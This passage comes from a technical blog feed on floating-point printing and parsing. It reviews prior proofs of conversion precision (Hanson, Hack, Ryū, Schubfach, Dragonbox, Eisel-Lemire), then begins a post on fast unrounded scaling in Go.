depend on computing the convergents of continued fractions of <math><mrow><mi>c</mi><mn>/</mn><mi>m</mi></mrow></math>
and proving properties about them.
Specifically, the result of <i>FirstModBelow</i> must be the denominator of a
convergent or semiconvergent in the continued fraction for <math><mrow><mi>c</mi><mn>/</mn><mi>m</mi></mrow></math>,
so it suffices to find the last even convergent <math><mrow><mi>p</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mn>/</mn><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub></mrow></math> such that <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>></mo><mtext><i>hi</i></mtext></mrow></math>
but <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mo stretchy=false>(</mo><mi>i</mi><mo>+</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mtext><i>hi</i></mtext></mrow></math>,
and then
compute the correct <math><mrow><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo>+</mo><mi>k</mi><mo>·</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub></mrow></math>
by looking at how much <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> subtracts from <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> and
subtracting it just enough times.
I had resigned myself to implementing this approach before I found
David Wärn’s simpler proof of the direct GCD-like approach in <code>modfirst</code>.
The intermediate steps in <math><mrow><mtext>GCD</mtext><mo stretchy=false>(</mo><mi>p</mi><mo>,</mo><mi>q</mi><mo stretchy=false>)</mo></mrow></math> are exactly the continued fraction representation of <math><mrow><mi>p</mi><mn>/</mn><mi>q</mi></mrow></math>,
so it is not surprising that both GCDs and
continued fractions can be used
for modular search.
<p>
No matter how <code>modfirst</code> is implemented,
the critical insight is Peters’s observaton
that “find the first” is a good building block for
the more sophisticated searches.
<p>
Paxson’s <i>ModMin</i>/<i>ModMax</i> are tailored to a
slightly different problem than we are solving.
Instead of analyzing a particular multiplicative constant
(a specific <math><MI>𝑝𝑚</MI></math> or <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> value),
Paxson is looking directly for decimal numbers as close as
possible to midpoints between binary floating-point numbers and vice versa.
That means finding <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> near <math><mrow><mi>m</mi><mn>/2</mn></mrow></math> modulo <math><mi>m</mi></math>.
This post’s proof is concerned with those values as well,
but also the ones near integers. So we look for <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
near zero modulo <math><mrow><mn>2</mn><mi>m</mi></mrow></math>, which is a little simpler.
Paxson couldn’t use that because it would find numbers
near zero modulo <math><mi>m</mi></math> in addition to numbers near <math><mrow><mi>m</mi><mn>/2</mn></mrow></math> modulo <math><mi>m</mi></math>.
The former are especially easy to round, so Paxson needs to exclude them.
(In contrast, numbers near zero modulo <math><mi>m</mi></math> are a problem for <math><mtext>Scale</mtext></math>
because the caller might want to take their floor or ceiling.)
<a class=anchor href="#hanson_1997"><h3 id="hanson_1997">Hanson 1997</h3></a>
<p>
→ Kenton Hanson, “<a href="https://web.archive.org/web/20000607192440/http://www.dnai.com/~khanson/ECRBDC.html">Economical Correctly Rounded Binary Decimal Conversions</a>”, published online 1997.
<p>
The next analysis of floating-point rounding difficulty that I found
is a paper published on the web by Kenton Hanson in 1997,
reporting work done earlier at Apple Computer using a <a href="https://en.wikipedia.org/wiki/Macintosh_Quadra">Macintosh Quadra</a>,
which perhaps dates it to the early 1990s.
Hanson’s web site is down and email to the address on the paper bounces. The link above is to a copy on the Internet Archive, but it omits the figures,
which seem crucial to fully understanding the paper.
<p>
Hanson identified patterns that can be exploited to grow short “hard”
conversions into longer ones.
Then he used those longest hard conversions as the basis for an argument
that conversion works correctly for all conversions up to that length:
“Once this worst case is determined we have shown how we can
guarantee correct conversions using arithmetic that is slightly
more than double the precision of the target destinations.”
<p>
Hanson focused on 113-bit floating-point numbers, using 256-bit mantissas
for scaling, and only rounding conversions.
I expect that his approach would have worked for
proving that 53-bit floating-point
numbers can be converted with 128-bit mantissas,
but I have not reconstructed it and confirmed that.
<a class=anchor href="#hack_2004"><h3 id="hack_2004">Hack 2004</h3></a>
<p>
→ Gordon Slishman, “<a href="https://mp7.watson.ibm.com/f55d084fadf9ae59852574ab0058f749.html">Fast and Perfectly Rounding Decimal/Hexadecimal Conversions</a>”, IBM Research Report, April 1990. <br>
→ P.H. Abbott <i>et al.</i>, “<a href="https://ieeexplore.ieee.org/document/5389154">Architecture and software support in IBM S/390 Parallel Enterprise Servers for IEEE Floating-Point arithmetic</a>”, <i>IBM Journal of Research and Development</i>, September 1999. <br>
→ Michel Hack, “<a href="https://dominoweb.draco.res.ibm.com/reports/rc23203.pdf">On Intermediate Precision Required for Correctly-Rounding Decimal-to-Binary Floating-Point Conversion</a>”, IBM Technical Paper, 2004.
<p>
The next similar discovery appears to be Hack’s 2004 work at IBM.
<p>
In 1990, Slishman had published a conversion method that used
floating-point approximations, like in this post.
Slishman used a 16-bit middle and recognized that
a non-<code>0xFFFF</code> <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> implied the correctness of the top section.
His algorithm fell back to a slow bignum implementation
when <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> was <code>0xFFFF</code> and carry error could not be ruled out (approximately <math><mrow><mn>1/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math> of the time).
(Hack defined <math><MI>𝑝𝑚</MI></math> to be a floor instead of a ceiling, so the error condition
is inverted from ours.)
<p>
In 1999, Abbott <i>et al.</i> (including Hack) published a comprehensive article
about the S/390’s new support for IEEE floating-point
(as opposed to its <a href="https://en.wikipedia.org/wiki/IBM_hexadecimal_floating-point">IBM hexadecimal floating point</a>).
In that article, they observed (like Paxson) that difficult numbers
can be generated by using continued fraction expansion of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values.
They also observed that bounding the size of the
continued fraction expansion would bound the precision required,
potentially leading to bignum-free conversions.
<p>
Following publication of that article, Alan Stern initiated “a spirited e-mail exchange
during the spring of 2000” and “pointed out that the hints at improvement
mentioned in that article were still too conservative.”
As a result of that exchange, Hack launched a renewed investigation
of the error behavior, leading to the 2004 technical report.
<p>
Hack’s report only addresses decimal-to-binary (parsing) with a fixed-length input,
not binary-to-decimal (printing),
even though the comments in the 1999 article were about both directions
and the techniques would apply equally well to binary-to-decimal.
<p>
In the terminology of this post,
Hack proved that analysis of the continued fraction
for a specific <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> can establish a lower bound <math><mi>L</mi></math>
such that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo><</mo><mi>L</mi></mrow></math> if and only if
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>.
For an <math><mi>n</mi></math>-digit decimal input,
<math><mrow><mi>L</mi><mo>=</mo><mn>1/</mn><mo stretchy=false>(</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo>·</mo><mo stretchy=false>(</mo><mi>k</mi><mo>+</mo><mn>2</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></math> where <math><mi>k</mi></math> is the maximum partial quotient
in the continued fraction expansion of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
following certain convergents.
<p>
Hack summarizes:<blockquote>
<p>
Using Continued Fraction expansions of a set of ratios of powers of two and five
we can derive tight bounds on the intermediate precision required to
perform correctly-rounding floating-point conversion:
it is the sum of three components: the number of bits in the target format,
the number of bits in the source format, and the number of bits in the largest
partial quotient that follows a partial convergent of the “right” size
among those Continued Fraction expansions.
(This is in addition to the small number of bits needed to cover computational loss,
e.g. when multiple truncating or rounding multiplications are performed.)
<p>
When both source and target precision are fixed, the set of ratios to be
expanded grows linearly with the target exponent range, and is small enough
to permit a simple exhaustive search, in the case of the IEEE 754 standard
formats: the extra number of bits (3rd component of the sum mentioned above)
is 11 for 19-digit Double Precision and 13 for 36-digit Extended Precision.</blockquote>
<p>
I admit to discomfort with both Paxson’s and Hack’s
use of continued fraction analysis.
The math is subtle, and it seems easy to overlook a relevant case.
For example Paxson needs semiconvergents for <i>FirstModBelow</i>
but Hack does not explicitly mention them.
Even though I trust that both Paxson’s and Hack’s results are correct,
I do not trust myself to adapt them to new contexts
without making unjustified mathematical assumptions.
In contrast, the explicit GCD-like algorithm in <code>modfirst</code>
and explicit searches based on it seem far less
sophisticated and less error-prone to adapt.
<a class=anchor href="#giulietti_2018"><h3 id="giulietti_2018">Giulietti 2018</h3></a>
<p>
→ Raffaello Giulietti, “<a href="https://drive.google.com/file/d/1IEeATSVnEE6TkrHlCYNY2GjaraBjOT4f/edit">The Schubfach way to render doubles</a>,” published online, 2018, revised 2021. <br>
→ Dmitry Nadhezin, <a href="https://github.com/nadezhin/verify-todec">nadezhin/verify-todec GitHub repository</a>, published online, 2018.
<p>
Raffaello Giulietti developed the Schubfach algorithm while working on
<a href="https://bugs.openjdk.org/browse/JDK-4511638">Java bug JDK-4511638</a>,
that <code>Double.toString</code> sometimes returned non-shortest results,
most notably ‘9.999999999999999e22’ for 1e23.
Giulietti’s original solution contained a fallback to multiprecision
arithmetic in certain cases,
and he wrote a paper proving the solution’s correctness
(I have been unable to find that original code, nor the first version of the paper,
which was apparently titled “Rendering doubles in Java”.)
<p>
Dmitry Nadhezin set out to <a href="https://github.com/nadezhin/verify-todec/blob/master/README.md">formally check the proof</a> using the ACL2 theorem prover.
During that effort, Giulietti and Nadhezin came across Hack’s 2004 paper
and realized they could remove the multiprecision arithmetic entirely.
Nadhezin adapted Hack’s analysis and proved Giulietti’s entire conversion algorithm
correct using the ACL2 theorem prover.
As part of that proof, Nadhezin proved (and formally verified)
that the spacing around exact integer results that might arise during
Schubfach’s printing algorithm is at least <math><mrow><mi>ε</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>64</mn></mrow></msup></mrow></math> in either direction
allowing the use of 126-bit <math><MI>𝑝𝑚</MI></math> values.
(Using 126 instead of 128 is necessary
because Java has only a signed 64-bit integer type.)
<!-- Note: Guy Steele reviewed the paper. https://bugs.openjdk.org/browse/JDK-8202555 -->
<a class=anchor href="#adams_2018"><h3 id="adams_2018">Adams 2018</h3></a>
<p>
→ Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3192366.3192369">Ryū: Fast Float-to-String Conversion</a>”, ACM PLDI 2018.
<!-- TODO what was Adams's inspiration? -->
<p>
Independent of Giulietti’s work,
Ulf Adams developed a different floating-point printing algorithm named Ryū,
also based on 128-bit (or in Java, 126-bit) <math><MI>𝑝𝑚</MI></math> values.
Adams proved the correctness of a computation for
<math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mn>/10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math> using <math><mrow><mo stretchy=false>⌊</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌋</mo></mrow></math> for positive <math><mi>p</mi></math>
and <math><mrow><mo stretchy=false>⌈</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌉</mo></mrow></math> for negative <math><mi>p</mi></math>.
Doubling <math><mi>x</mi></math> provides the ½ bit,
but Ryū does not compute the sticky bit
as part of that computation.
Instead, Ryū computes an exactness bit
(the inverse of the sticky bit)
by explicitly testing <math><mrow><mi>x</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>0</mn></mrow></math> for <math><mrow><mi>p</mi><mo>></mo><mn>0</mn></mrow></math>
and <math><mrow><mi>x</mi><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo>=</mo><mn>0</mn></mrow></math> for <math><mrow><mi>p</mi><mo><</mo><mn>0</mn></mrow></math>.
The latter is done iteratively, requring
up to 23 64-bit divisions in the worst case.
(It is possible to <a href="https://go.googlesource.com/go/+/refs/tags/go1.26rc1/src/internal/strconv/math.go#93">reduce this to a single 64-bit multiplication</a>
by a constant obtained from table lookup,
but Ryū does not.)
<p>
Like any of these proofs,
Adams’s proof of correctness of the truncated result
needs to analyze specific <math><MI>𝑝𝑚</MI></math> or <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values.
Adams chose to analyze the <math><MI>𝑝𝑚</MI></math> values
and defined a function <math><mrow><mtext><code>minmax_euclid</code></mtext><mo stretchy=false>(</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo>,</mo><mi>M</mi><mo stretchy=false>)</mo></mrow></math>
that returns the minimum and maximum values of <math><mrow><mi>x</mi><mo>·</mo><mi>a</mi><MO>mod</MO><mi>b</mi></mrow></math> for <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mi>M</mi><mrow><mspace height='0em' /><mn>′</mn>
</mrow><mo stretchy=false>]</mo></mrow></math>
for some <math><mrow><mi>M</mi><mrow><mspace height='0em' /><mn>′</mn>
</mrow><mo>≥</mo><mi>M</mi></mrow></math> chosen by the algorithm.
The paper includes a dense page-long proof of the correctness of
<code>minmax_euclid</code>, but it must contain a mistake,
since <code>minmax_euclid</code> turns out not to be correct.
As one example, Junekey Jeon has pointed out that <math><mrow><mtext><code>minmax_euclid</code></mtext><mo stretchy=false>(</mo><mn>3</mn><mo>,</mo><mn>8</mn><mo>,</mo><mn>7</mn><mo stretchy=false>)</mo></mrow></math>
returns a minimum of 1 and maximum of 0.
We can verify this by implementing <code>minmax_euclid</code> in Ivy:
<pre class='language-ivy'>op minmax_euclid (a b M) =
s t u v = 1 0 0 1
:while 1
:while b >= a
b u v = b u v - a s t
(-u) >= M: :ret a b
:end
b == 0: :ret 1 (b-1)
:while a >= b
a s t = a s t - b u v
s >= M: :ret a b
:end
a == 0: :ret 1 (b-1)
:end
minmax_euclid 3 8 7
-- out --
1 0
</pre>
<p>
Jeon also points out that the trouble begins on the first line of Adams’s proof,
which claims that <math><mrow><mi>a</mi><mo>≤</mo><mo stretchy=false>(</mo><MO form='prefix'>−</MO><mi>a</mi><mo stretchy=false>)</mo><MO>mod</MO><mi>b</mi></mrow></math>,
but that is false for <math><mrow><mi>a</mi><mo>></mo><mi>b</mi><mn>/2</mn></mrow></math>.
However, the general idea is right, and Adams’s Ryū repository
contains a <a href="https://github.com/ulfjack/ryu/blob/6a02945a5abd/src/main/java/info/adams/ryu/analysis/EuclidMinMax.java#L83">more complex and apparently fixed version</a> of the max
calculation.
Even corrected, the results are loose in two directions: they include <math><mi>x</mi></math> both smaller
and larger than the exact range <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>.
<a class=anchor href="#jeon_2020"><h3 id="jeon_2020">Jeon 2020</h3></a>
<p>
→ Junekey Jeon, “<a href="https://fmt.dev/papers/Grisu-Exact.pdf">Grisu-Exact: A Fast and Exact Floating-Point Printing Algorithm</a>”, published online, 2020.
<p>
In 2020, Jeon published a paper about Grisu-Exact, an exact variation of the Grisu algorithm
without the need for a bignum fallback algorithm.
Jeon relied on Adams’s general proof approach but pointed out the problems
with <code>minmax_euclid</code> mentioned in the previous section and supplied a replacement
algorithm and proof of its correctness.
<pre class='language-ivy'>op minmax_euclid (a b M) =
modulo = b
s u = 1 0
:while 1
q = (ceil b/a) - 1
b1 = b - q*a
u1 = u + q*s
:if M < u1
k = floor (M-u) / s
:ret a ((modulo - b) + k*a)
:end
p = (ceil a/b1) - 1
a1 = a - p*b1
s1 = s + p*u1
:if M < s1
k = floor (M-s) / u1
:ret (a-k*b1) (modulo - b1)
:end
:if (b1 == b) and (a1 == a)
:if M < s1 + u1
:ret a1 (modulo - b1)
:else
:ret 0 (modulo - b1)
:end
:end
a b s u = a1 b1 s1 u1
:end
minmax_euclid 3 8 7
-- out --
1 7
</pre>
<a class=anchor href="#lemire_2023"><h3 id="lemire_2023">Lemire 2023</h3></a>
<p>
→ Daniel Lemire, “<a href="https://arxiv.org/abs/2101.11408">Number Parsing at a Gigabyte per Second</a>”, <i>Software—Pratice and Experience</i>, 2021. <br>
→ Noble Mushtak and Daniel Lemire, “<a href="https://arxiv.org/pdf/2212.06644">Fast Number Parsing Without Fallback</a>”, <i>Software—Pratice and Experience</i>, 2023.
<p>
In March 2020, Lemire published code for a fast floating-point parser
for up to 19-digit decimal inputs
using a 128-bit <math><MI>𝑝𝑚</MI></math>, based on an idea by Michael Eisel.
Nigel Tao <a href="https://nigeltao.github.io/blog/2020/eisel-lemire.html">blogged about it in 2020</a>
and Lemire published the algorithm in <i>Software—Practice and Experience</i> in 2021.
<p>
As published in 2021, Lemire’s algorithm uses <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></math> and
therefore checks for <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>1</mn></mrow></msup></mrow></math> as a sign of possible inexactness.
Upon finding that condition, the algorithm falls back to a bignum-based
implementation.
<p>
In 2023, Mushtak and Lemire published a short but dense followup note proving that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>1</mn></mrow></msup></mrow></math>
is impossible, and therefore the fallback check is unnecessary and can be removed.
They address only the specific case of a 64-bit input and 73-bit middle,
making the usual continued fraction arguments to bound the error for non-exact results.
<p>
Empirically, Mushtak and Lemire’s computational proof does not generalize to other sizes.
I <a href="https://github.com/fastfloat/fast_float/blob/main/script/mushtak_lemire.py">downloaded their Python script</a> and changed it from analyzing <math><mrow><mi>N</mi><mo>=</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo>=</mo><mn>137</mn></mrow></math>
to analyze other sizes and observed both false positives and false negatives.
I believe the false negatives are from omitting semiconvergents
(unnecessary for <math><mrow><mi>N</mi><mo>=</mo><mn>137</mn></mrow></math>, as proved in their Theorem 2)
and the false positives are from the approach not limiting <math><mi>x</mi></math>
to the range <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>.
<a class=anchor href="#jeon_2024"><h3 id="jeon_2024">Jeon 2024</h3></a>
<p>
→ Junekey Jeon, “<a href="https://raw.githubusercontent.com/jk-jeon/dragonbox/master/other_files/Dragonbox.pdf">Dragonbox: A New Floating-Point Binary-to-Decimal Conversion Algorithm</a>”, published online, 2024.
<p>
In 2024, Jeon published Dragonbox, a successor to Grisu-Exact.
Jeon changed from using the corrected <code>minmax_euclid</code> implementation
to using a proof based on continued fractions.
Algorithm C.14 (“Finding best rational approximations from below and above”)
is essentially equivalent to Paxson’s algorithms.
Like in Ryū and Grisu-Exact, the proof
only considers the truncated computation <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math>
and computes an exactness bit separately.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
This post proved that <math><mtext>Scale</mtext></math> can be implemented
correctly using a fast approximation
that involves only a few word-sized multiplications and shifts.
For printing and parsing of float64 values, computing the top
128 bits of a 64×128-bit multiplication is sufficient.
<p>
The fact that float64 conversions require only 128-bit precision
has been known since at least Hanson’s work at Apple in the mid-1990s,
but that work was not widely known and did not include a proof.
Paxson used an exact computational worst case analysis of modular multiplications
to find difficult conversion cases; he did not
bound the precision needed for parsing and printing.
In contrast, Hack, Giulietti and Nadhezin, Adams, Mushtak and Lemire, and Jeon
all derived ways to bound the precision needed for parsing or printing,
but none of them used an exact computational worst case analysis
that generalizes to arbitrary floating-point formats,
and none recognized the commonality between parsing and printing.
<p>
The approach in this post, based on Paxson’s general approach
and built upon a modular analysis primitive by David Wärn,
is the first exact analysis that generalizes to arbitrary formats
and handles both parsing and printing.
<p>
In this post, I have tried to give credit where credit is due
and to represent others’ work fairly and accurately.
I would be extremely grateful to receive additions, corrections,
or suggestions at <a href="mailto:rsc@swtch.com">rsc@swtch.com</a>.
Floating-Point Printing and Parsing Can Be Simple And Fasttag:research.swtch.com,2012:research.swtch.com/fp2026-01-19T16:45:00-05:002026-01-19T16:47:00-05:00Fast and simple conversion between floating-point and decimal. (Floating Point Formatting, Part 3)<style>
@media print {
table img[src*="-scat"] {
width: 432px;
height: auto;
}
table img[src*="-cdf"] {
width: 288px;
height: auto;
}
}
</style>
<style>
.main-wide td {
padding-left: 0 !important;
padding-right: 0 !important;
padding-top: 0 !important;
padding-bottom: 0 !important;
}
.main-wide td img { padding: 0; }
.main-wide table { border: none !important; }
.main-wide tr.th { border: none !important; }
</style>
<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
A floating point number <math><mi>f</mi></math> has the form <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>
where <math><mi>m</mi></math> is called the <i>mantissa</i>
and <math><mi>e</mi></math> is a signed integer <i>exponent</i>.
We like to read numbers scaled by powers of ten,
not two, so computers need algorithms to convert binary floating-point
to and from decimal text.
My 2011 post “<a href="https://research.swtch.com/ftoa">Floating Point to Decimal Conversion is Easy</a>”
argued that these conversions can be simple as long as you
don’t care about them being fast.
But I was wrong: fast converters can be simple too,
and this post shows how.
<p>
The main idea of this post is to implement <i>fast unrounded scaling</i>,
which computes an approximation to <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
often in a single 64-bit multiplication.
On that foundation
we can build nearly trivial printing and parsing algorithms that run very fast.
In fact, the printing algorithms
run faster than all other known algorithms,
including
Dragon4 [<a class=footref id='fnref-30' href='#fn-30'>30</a>],
Grisu3 [<a class=footref id='fnref-23' href='#fn-23'>23</a>],
Errol3 [<a class=footref id='fnref-4' href='#fn-4'>4</a>],
Ryū [<a class=footref id='fnref-2' href='#fn-2'>2</a>],
Ryū Printf [<a class=footref id='fnref-3' href='#fn-3'>3</a>],
Schubfach [<a class=footref id='fnref-12' href='#fn-12'>12</a>],
and Dragonbox [<a class=footref id='fnref-17' href='#fn-17'>17</a>],
and the parsing algorithm runs faster than
the Eisel-Lemire algorithm [<a class=footref id='fnref-22' href='#fn-22'>22</a>].
This post presents both the algorithms and a concrete implementation in Go.
I expect some form of this Go code to ship in Go 1.27 (scheduled for August 2026).
<p>
This post is rather long—far longer than the implementations!—so here is a brief overview of the sections
for easier navigation and understanding where we’re headed.
<ul>
<li>
“<a href="#numbers">Fixed-Point and Floating-Point Numbers</a>”
briefly reviews fixed-point and floating-point numbers,
establishing some terminology and concepts needed for the rest of the post.
<li>
“<a href="#unround">Unrounded Numbers</a>” introduces the idea of unrounded numbers,
inspired by the IEEE754 floating-point extended format.
<li>
“<a href="#scale">Unrounded Scaling</a>” defines the unrounded scaling primitive.
<li>
“<a href="#fixedwidth">Fixed-Width Printing</a>” formats floating-point numbers
with a given (fixed) number of decimal digits, at most 18.
<li>
“<a href="#parsing">Parsing Decimals</a>” parses decimal numbers of
at most 19 digits into floating-point numbers.
<li>
“<a href="#short">Shortest-Width Printing</a>” formats floating-point numbers
using the shortest representation that parses back to the original number.
<li>
“<a href="#fast">Fast Unrounded Scaling</a>” reveals the
short but subtle implementation of fast unrounded scaling
that enables those simple algorithms.
<li>
“<a href="#proof">Sketch of a Proof of Fast Scaling</a>” briefly sketches the proof
that the fast unrounded scaling algorithm is correct.
A companion post, “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>”
provides the full details.
<li>
“<a href="#omit">Omit Needless Multiplications</a>” uses a key idea from the proof
to optimize the fast unrounded scaling implementation further,
reducing it to a single 64-bit multiplication in many cases.
<li>
“<a href="#perf">Performance</a>” compares the performance of the
implementation of these algorithms against earlier ones.
<li>
“<a href="#history">History and Related Work</a>” examines the history of
solutions to the floating-point printing and parsing problems
and traces the origins of the specific ideas used in this
post’s algorithms.</ul>
<p>
For the last decade, there has been a new algorithm for floating-point printing and parsing
every few years.
Given the simplicity and speed of the algorithms in this post
and the increasingly small deltas between successive algorithms,
perhaps we are nearing an optimal solution.
<a class=anchor href="#numbers"><h2 id="numbers">Fixed-Point and Floating-Point Numbers</h2></a>
<p>
Fixed-point numbers have the form <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mi>B</mi><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> for an integer mantissa <math><mi>m</mi></math>, constant base <math><mi>B</mi></math>, and constant (fixed) exponent <math><mi>e</mi></math>.
We can create fixed-point representations
in any base, but the most common are base 2 (for computers)
and base 10 (for people).
This diagram shows fixed-point numbers at various scales
that can represent numbers between 0 and 1:
<p>
<img name="fpfmt-ruler1" class="center pad" width=410 height=230 src="fpfmt-ruler1.svg">
<p>
Using a smaller scaling factor increases precision
at the cost of larger mantissas.
When representing very large numbers, we can use
larger scaling factors to reduce the mantissa size.
For example, here are various representations of
numbers around one billion:
<p>
<img name="fpfmt-ruler2" class="center pad" width=400 height=210 src="fpfmt-ruler2.svg">
<p>
Floating-point numbers are the same as base-2 fixed-point numbers except that
<math><mi>e</mi></math> changes with
the overall size of the number.
Small numbers use very small scaling factors
while large numbers use large scaling factors,
aiming to keep the mantissas a constant length.
For float64s, the exponent <math><mi>e</mi></math> is chosen so that the mantissa <math><mi>m</mi></math> has 53 bits,
meaning <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>.
For example, for numbers in <math><mrow><mo stretchy=false>[</mo><mn>½</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>, float64s use <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>53</mn></mrow></math>;
for numbers in <math><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math> they use <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>52</mn></mrow></math>;
and so on.
<p>
[The notation <math><mrow><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></math> is a <i>half-open interval</i>, which includes <math><mi>a</mi></math> but not <math><mi>b</mi></math>.
In contrast, the <i>closed interval</i> <math><mrow><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>]</mo></mrow></math> includes both <math><mi>a</mi></math> and <math><mi>b</mi></math>.
We write <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></math> or <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>]</mo></mrow></math> to say that <math><mi>x</mi></math> is in that interval.
